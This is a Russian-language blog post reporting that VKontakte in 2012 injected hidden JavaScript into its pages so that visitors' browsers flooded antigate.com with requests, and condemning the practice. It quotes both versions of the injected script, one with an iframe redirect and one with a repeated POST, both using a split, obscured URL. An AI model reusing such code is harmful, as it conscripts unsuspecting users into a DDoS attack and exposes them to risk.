26 апреля 2012 юзер с сайта roem обнаружил что на страницах социальной сети ВКонтакте появился код, который без ведома пользователя шлет запросы на сайт antigate.com. Зачем это? Чтобы вывести сайт antigate из строя множеством запросов, это называется DDOS-атакой. Пользователи ВКонтакте поневоле стали вовлечены в уголовно наказуемое преступление, а их компьютеры были подвергнуты возможности заражения вирусами.
Выглядит это вот так:
PHP код:
function _test() {
var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write('<script>this.location="http://ant'+'iga'+'te.com/i'+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+'g=o'+'n";</sc'+'ript>');setTimeout(re.pbind(fr),1000);
}
<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()">
Вообще, при такой ламерской организации атаки, antigate мог бы продать весь трафик в какой-нибудь ботнет, и неплохо заработать. А все пользователи ВКонтакте, которые не ставят обновления на свои компьютеры, могли бы стать частью ботнета. Но antigate поступил более прикольно — он сделал редирект на порносайт из iframe
В итоге, ничего не подозревающий пользователь ВКонтакте, открывая vk.com, оказывался на порносайте.
После этого код убрали, а затем установили новый код, через который уже тяжело причинить вред пользователю ВКонтакте:
PHP код:
function _test(){var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write('<script>var XHR=window.XDomainRequest||window.XMLHttpRequest,xhr=new XHR();xhr.open("POST","http://ant'+'iga'+'te.com/i'+'n.php",true);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");var tmp2="e8532291e45ec27a85e87692e070da98";for(i=0;i<5;++i)tmp2+=tmp2;xhr.send("method=base64&key=fb856f0ab752e3894fbdb3c4613ca924&body="+tmp2+"&ext=jpg");</sc'+'ript>');d.close();setTimeout(re.pbind(fr),1000);}
Не нужно говорить, наверное, что если бы Facebook перенаправлял своих пользователей на порносайт хотя бы несколько секунд, то это событие получило бы большую огласку. У нас же в новостях пока пусто.
Можно долго спорить о том что antigate помогает спамерам, и заддосить его это хорошо. Но дело не в том какой сайт подвергся атаке, а в том что в цивилизованной (а мы ведь хотим чтобы Россия была цивилизованной страной?) крупнейшая социальная сеть, не уведомляя своих пользователей, во-первых вовлекает пользователей в уголовно наказуемое преступление, во-вторых подвергает риску заражения вирусами их компьютеры, и в-третьих расходует их траффик, за который пользователи платят деньги. На лицо грубое применение силы в стиле «братки из 90-х», что просто недопустимо в цивилизованном обществе.
источник: paulov.ru